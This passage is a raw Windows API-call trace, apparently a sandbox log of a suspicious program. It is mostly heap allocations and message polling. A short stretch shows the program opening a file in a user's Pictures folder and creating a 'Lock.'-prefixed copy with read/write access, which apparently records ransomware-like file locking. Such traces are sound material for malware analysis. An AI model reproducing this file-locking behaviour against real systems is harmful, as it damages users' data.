lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0255.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.506] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.506] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.506] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.506] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/itO8mb4FwKJbnFD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0255.507] GetLastError () returned 0x5 [0255.509] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.509] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.509] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0255.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.itO8mb4FwKJbnFD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.ito8mb4fwkjbnfd"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0255.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.512] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.512] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.512] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0255.512] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.513] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0255.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.513] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.514] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.514] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.515] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.515] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.515] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.515] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.515] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.516] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.516] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.516] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.516] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.516] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.516] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.516] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.517] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.517] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.517] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.517] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.517] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, 